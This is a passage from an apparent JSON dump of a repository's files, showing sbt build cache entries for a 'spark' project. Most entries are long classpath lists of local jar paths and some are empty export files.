ev/jna/jna/4.5.0/jna-4.5.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lihaoyi/fastparse-utils_2.12/0.4.2/fastparse-utils_2.12-0.4.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lmax/disruptor/3.4.2/disruptor-3.4.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/inject/javax.inject/1/javax.inject-1.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/tasks_2.12/1.3.8/tasks_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/reactivestreams/reactive-streams/1.0.2/reactive-streams-1.0.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/slf4j/slf4j-api/1.7.26/slf4j-api-1.7.26.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/swoval/file-tree-views/2.1.3/file-tree-views-2.1.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/squareup/okhttp3/okhttp/3.14.2/okhttp-3.14.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lihaoyi/sourcecode_2.12/0.1.3/sourcecode_2.12-0.1.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-analysis/7.0/asm-analysis-7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/jcraft/jsch/0.1.54/jsch-0.1.54.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-scripted_2.12/1.3.3/util-scripted_2.12-1.3.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-model/3.3.9/maven-model-3.3.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-cache_2.12/1.3.3/util-cache_2.12-1.3.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-commons/7.0/asm-commons-7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/logging/log4j/log4j-slf4j-impl/2.11.2/log4j-slf4j-impl-2.11.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/net/java/dev/jna/jna-platform/4.5.0/jna-platform-4.5.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/jline/jline/2.14.6/jline-2.14.6.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/sbt/1.3.8/sbt-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/ant/ant-launcher/1.9.9/ant-launcher-1.9.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/protocol_2.12/1.3.8/protocol_2.12-1.3.8.jar:/Users/xander/.sbt/boot/scala-2.12.10/lib/scala-reflect.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lihaoyi/fastparse_2.12/0.4.2/fastparse_2.12-0.4.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/modules/scala-parser-combinators_2.12/1.1.2/scala-parser-combinators_2.12-1.1.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc_2.12/1.3.4/zinc_2.12-1.3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/github/cb372/scalacache-caffeine_2.12/0.20.0/scalacache-caffeine_2.12-0.20.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/ivy/ivy/2.3.0-sbt-88d6a93d15f9b029958c1c289a8859e8dfe31a19/ivy-2.3.0-sbt-88d6a93d15f9b029958c1c289a8859e8dfe31a19.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/logic_2.12/1.3.8/logic_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-tree/7.0/asm-tree-7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/ipcsocket/ipcsocket/1.0.0/ipcsocket-1.0.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-persist_2.12/1.3.4/zinc-persist_2.12-1.3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/shaded-scalajson_2.12/1.0.0-M4/shaded-scalajson_2.12-1.0.0-M4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.3.2/org.eclipse.sisu.inject-0.3.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/collections_2.12/1.3.8/collections_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.3.2/org.eclipse.sisu.plexus-0.3.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/launcher-interface/1.1.3/launcher-interface-1.1.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/pantsbuild/jarjar/1.7.2/jarjar-1.7.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/trueaccord/scalapb/scalapb-runtime_2.12/0.6.0/scalapb-runtime_2.12-0.6.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/compiler-interface/1.3.4/compiler-interface-1.3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-control_2.12/1.3.3/util-control_2.12-1.3.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/test-agent/1.3.8/test-agent-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-classfile_2.12/1.3.4/zinc-classfile_2.12-1.3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-apiinfo_2.12/1.3.4/zinc-apiinfo_2.12-1.3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/completion_2.12/1.3.8/completion_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-classworlds/2.5.2/plexus-classworlds-2.5.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-compile_2.12/1.3.4/zinc-compile_2.12-1.3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/io/get-coursier/lm-coursier-shaded_2.12/2.0.0-RC5-3/lm-coursier-shaded_2.12-2.0.0-RC5-3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/core-macros_2.12/1.3.8/core-macros_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/run_2.12/1.3.8/run_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/github/cb372/scalacache-core_2.12/0.20.0/scalacache-core_2.12-0.20.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-position_2.12/1.3.3/util-position_2.12-1.3.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/sjson-new-core_2.12/0.8.3/sjson-new-core_2.12-0.8.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/typesafe/config/1.3.3/config-1.3.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/librarymanagement-core_2.12/1.3.1/librarymanagement-core_2.12-1.3.1.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/sbinary_2.12/0.5.0/sbinary_2.12-0.5.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/squareup/okhttp3/okhttp-urlconnection/3.7.0/okhttp-urlconnection-3.7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm/7.0/asm-7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/logging/log4j/log4j-api/2.11.2/log4j-api-2.11.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/squareup/okio/okio/1.17.2/okio-1.17.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-interface/1.3.3/util-interface-1.3.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.11.2/log4j-core-2.11.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-logging_2.12/1.3.3/util-logging_2.12-1.3.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-tracking_2.12/1.3.3/util-tracking_2.12-1.3.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/sjson-new-murmurhash_2.12/0.8.3/sjson-new-murmurhash_2.12-0.8.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/compiler-bridge_2.12/1.3.4/compiler-bridge_2.12-1.3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/actions_2.12/1.3.8/actions_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/scripted-sbt-redux_2.12/1.3.8/scripted-sbt-redux_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scalactic/scalactic_2.12/3.0.8/scalactic_2.12-3.0.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-utils/3.0.22/plexus-utils-3.0.22.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-compile-core_2.12/1.3.4/zinc-compile-core_2.12-1.3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/testing_2.12/1.3.8/testing_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/scripted-plugin_2.12/1.3.8/scripted-plugin_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo.scala-sbt.org/scalasbt/sbt-plugin-releases/com.eed3si9n/sbt-assembly/scala_2.12/sbt_1.0/0.14.10/jars/sbt-assembly.jar:/Users/xander/.sbt/boot/scala-2.12.10/lib/scala-library.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/template-resolver/0.1/template-resolver-0.1.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/librarymanagement-ivy_2.12/1.3.1/librarymanagement-ivy_2.12-1.3.1.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-lm-integration_2.12/1.3.8/zinc-lm-integration_2.12-1.3.8.jar\n"
  },
  {
    "path": "spark/project/target/streams/compile/internalDependencyClasspath/_global/streams/export",
    "content": "\n"
  },
  {
    "path": "spark/project/target/streams/compile/managedClasspath/_global/streams/export",
    "content": "/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/test-interface/1.0/test-interface-1.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/typesafe/ssl-config-core_2.12/0.4.0/ssl-config-core_2.12-0.4.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/io_2.12/1.3.3/io_2.12-1.3.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/main_2.12/1.3.8/main_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/trueaccord/lenses/lenses_2.12/0.4.12/lenses_2.12-0.4.12.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/command_2.12/1.3.8/command_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/github/ben-manes/caffeine/caffeine/2.5.6/caffeine-2.5.6.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/task-system_2.12/1.3.8/task-system_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/main-settings_2.12/1.3.8/main-settings_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/gigahorse-core_2.12/0.5.0/gigahorse-core_2.12-0.5.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/google/protobuf/protobuf-java/3.7.0/protobuf-java-3.7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/gigahorse-okhttp_2.12/0.5.0/gigahorse-okhttp_2.12-0.5.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-plugin-api/3.3.9/maven-plugin-api-3.3.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/sjson-new-scalajson_2.12/0.8.3/sjson-new-scalajson_2.12-0.8.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-relation_2.12/1.3.3/util-relation_2.12-1.3.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/modules/scala-xml_2.12/1.2.0/scala-xml_2.12-1.2.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/spire-math/jawn-parser_2.12/0.10.4/jawn-parser_2.12-0.10.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/ant/ant/1.9.9/ant-1.9.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-artifact/3.3.9/maven-artifact-3.3.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-classpath_2.12/1.3.4/zinc-classpath_2.12-1.3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-core_2.12/1.3.4/zinc-core_2.12-1.3.4.jar:/Users/xander/.sbt/boot/scala-2.12.10/lib/scala-compiler.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/net/java/dev/jna/jna/4.5.0/jna-4.5.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lihaoyi/fastparse-utils_2.12/0.4.2/fastparse-utils_2.12-0.4.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lmax/disruptor/3.4.2/disruptor-3.4.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/inject/javax.inject/1/javax.inject-1.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/tasks_2.12/1.3.8/tasks_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/reactivestreams/reactive-streams/1.0.2/reactive-streams-1.0.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/slf4j/slf4j-api/1.7.26/slf4j-api-1.7.26.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/swoval/file-tree-views/2.1.3/file-tree-views-2.1.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/squareup/okhttp3/okhttp/3.14.2/okhttp-3.14.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lihaoyi/sourcecode_2.12/0.1.3/sourcecode_2.12-0.1.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-analysis/7.0/asm-analysis-7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/jcraft/jsch/0.1.54/jsch-0.1.54.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-scripted_2.12/1.3.3/util-scripted_2.12-1.3.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-model/3.3.9/maven-model-3.3.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-cache_2.12/1.3.3/util-cache_2.12-1.3.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-commons/7.0/asm-commons-7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/logging/log4j/log4j-slf4j-impl/2.11.2/log4j-slf4j-impl-2.11.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/net/java/dev/jna/jna-platform/4.5.0/jna-platform-4.5.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/jline/jline/2.14.6/jline-2.14.6.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/sbt/1.3.8/sbt-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/ant/ant-launcher/1.9.9/ant-launcher-1.9.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/protocol_2.12/1.3.8/protocol_2.12-1.3.8.jar:/Users/xander/.sbt/boot/scala-2.12.10/lib/scala-reflect.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/lihaoyi/fastparse_2.12/0.4.2/fastparse_2.12-0.4.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/modules/scala-parser-combinators_2.12/1.1.2/scala-parser-combinators_2.12-1.1.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc_2.12/1.3.4/zinc_2.12-1.3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/github/cb372/scalacache-caffeine_2.12/0.20.0/scalacache-caffeine_2.12-0.20.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/ivy/ivy/2.3.0-sbt-88d6a93d15f9b029958c1c289a8859e8dfe31a19/ivy-2.3.0-sbt-88d6a93d15f9b029958c1c289a8859e8dfe31a19.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/logic_2.12/1.3.8/logic_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-tree/7.0/asm-tree-7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/ipcsocket/ipcsocket/1.0.0/ipcsocket-1.0.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-persist_2.12/1.3.4/zinc-persist_2.12-1.3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/shaded-scalajson_2.12/1.0.0-M4/shaded-scalajson_2.12-1.0.0-M4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.3.2/org.eclipse.sisu.inject-0.3.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/collections_2.12/1.3.8/collections_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.3.2/org.eclipse.sisu.plexus-0.3.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/launcher-interface/1.1.3/launcher-interface-1.1.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/pantsbuild/jarjar/1.7.2/jarjar-1.7.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/trueaccord/scalapb/scalapb-runtime_2.12/0.6.0/scalapb-runtime_2.12-0.6.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/compiler-interface/1.3.4/compiler-interface-1.3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-control_2.12/1.3.3/util-control_2.12-1.3.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/test-agent/1.3.8/test-agent-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-classfile_2.12/1.3.4/zinc-classfile_2.12-1.3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-apiinfo_2.12/1.3.4/zinc-apiinfo_2.12-1.3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/completion_2.12/1.3.8/completion_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-classworlds/2.5.2/plexus-classworlds-2.5.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-compile_2.12/1.3.4/zinc-compile_2.12-1.3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/io/get-coursier/lm-coursier-shaded_2.12/2.0.0-RC5-3/lm-coursier-shaded_2.12-2.0.0-RC5-3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/core-macros_2.12/1.3.8/core-macros_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/run_2.12/1.3.8/run_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/github/cb372/scalacache-core_2.12/0.20.0/scalacache-core_2.12-0.20.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-position_2.12/1.3.3/util-position_2.12-1.3.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/sjson-new-core_2.12/0.8.3/sjson-new-core_2.12-0.8.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/typesafe/config/1.3.3/config-1.3.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/librarymanagement-core_2.12/1.3.1/librarymanagement-core_2.12-1.3.1.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/sbinary_2.12/0.5.0/sbinary_2.12-0.5.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/squareup/okhttp3/okhttp-urlconnection/3.7.0/okhttp-urlconnection-3.7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm/7.0/asm-7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/logging/log4j/log4j-api/2.11.2/log4j-api-2.11.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/squareup/okio/okio/1.17.2/okio-1.17.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-interface/1.3.3/util-interface-1.3.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.11.2/log4j-core-2.11.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-logging_2.12/1.3.3/util-logging_2.12-1.3.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-tracking_2.12/1.3.3/util-tracking_2.12-1.3.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/sjson-new-murmurhash_2.12/0.8.3/sjson-new-murmurhash_2.12-0.8.3.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/compiler-bridge_2.12/1.3.4/compiler-bridge_2.12-1.3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/actions_2.12/1.3.8/actions_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/scripted-sbt-redux_2.12/1.3.8/scripted-sbt-redux_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scalactic/scalactic_2.12/3.0.8/scalactic_2.12-3.0.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-utils/3.0.22/plexus-utils-3.0.22.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-compile-core_2.12/1.3.4/zinc-compile-core_2.12-1.3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/testing_2.12/1.3.8/testing_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/scripted-plugin_2.12/1.3.8/scripted-plugin_2.12-1.3.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo.scala-sbt.org/scalasbt/sbt-plugin-releases/com.eed3si9n/sbt-assembly/scala_2.12/sbt_1.0/0.14.10/jars/sbt-assembly.jar:/Users/xander/.sbt/boot/scala-2.12.10/lib/scala-library.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/template-resolver/0.1/template-resolver-0.1.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/librarymanagement-ivy_2.12/1.3.1/librarymanagement-ivy_2.12-1.3.1.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-lm-integration_2.12/1.3.8/zinc-lm-integration_2.12-1.3.8.jar\n"
  },
  {
    "path": "spark/project/target/streams/compile/unmanagedClasspath/_global/streams/export",
    "content": "\n"
  },
  {
    "path": "spark/project/target/streams/compile/unmanagedJars/_global/streams/export",
    "content": "\n"
  },
  {
    "path": "spark/project/target/streams/runtime/dependencyClasspath/_global/streams/export",
